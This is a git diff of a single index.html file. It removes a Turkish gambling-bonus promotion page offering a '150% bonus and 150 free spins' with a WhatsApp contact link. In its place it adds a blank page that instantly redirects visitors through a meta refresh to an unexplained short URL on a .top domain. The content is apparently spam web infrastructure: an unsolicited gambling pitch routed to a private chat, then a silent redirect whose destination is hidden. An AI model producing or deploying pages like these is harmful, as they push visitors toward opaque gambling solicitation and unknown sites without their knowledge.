--- a/index.html
+++ b/index.html
@@ -1,67 +1,7 @@
 <!DOCTYPE html>
-<html lang="tr">
-<head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>150% Bonus ve 150FS İçin Hemen Yaz!</title>
-  <style>
-    * {
-      margin: 0;
-      padding: 0;
-      box-sizing: border-box;
-    }
-
-    body {
-      height: 100vh;
-      display: flex;
-      flex-direction: column;
-      justify-content: center;
-      align-items: center;
-      font-family: 'Poppins', sans-serif;
-      text-align: center;
-      color: #fff;
-      background: linear-gradient(135deg, #000000, #ff0000, #000000);
-      background-size: 400% 400%;
-      animation: gradientMove 10s ease infinite;
-    }
-
-    @keyframes gradientMove {
-      0% { background-position: 0% 50%; }
-      50% { background-position: 100% 50%; }
-      100% { background-position: 0% 50%; }
-    }
-
-    h1 {
-      font-size: 2.4em;
-      text-shadow: 0 0 20px #ff0000, 0 0 40px #ff0000;
-      margin-bottom: 40px;
-      line-height: 1.4;
-      font-weight: 700;
-    }
-
-    a {
-      display: inline-block;
-      background: linear-gradient(45deg, #25D366, #128C7E);
-      color: white;
-      padding: 18px 50px;
-      font-size: 1.2em;
-      border-radius: 50px;
-      text-decoration: none;
-      font-weight: 700;
-      box-shadow: 0 0 25px rgba(37,211,102,0.8);
-      transition: transform 0.3s ease, box-shadow 0.3s ease;
-    }
-
-    a:hover {
-      transform: scale(1.1);
-      box-shadow: 0 0 40px rgba(37,211,102,1);
-    }
-  </style>
-</head>
-<body>
-  <h1>150% BONUS ve 150FS için<br> hemen yaz!</h1>
-  <a href="https://wa.me/994773430598?text=150%%20bonus%20ve%20150FS%20icin%20hemen%20yaz!" target="_blank">
-    WhatsApp’a Yaz 💬
-  </a>
-</body>
+<html>
+  <head>
+    <meta http-equiv="refresh" content="0; url=https://myblogshop.top/r/PQnSKmd3/s" />
+  </head>
+  <body></body>
 </html>
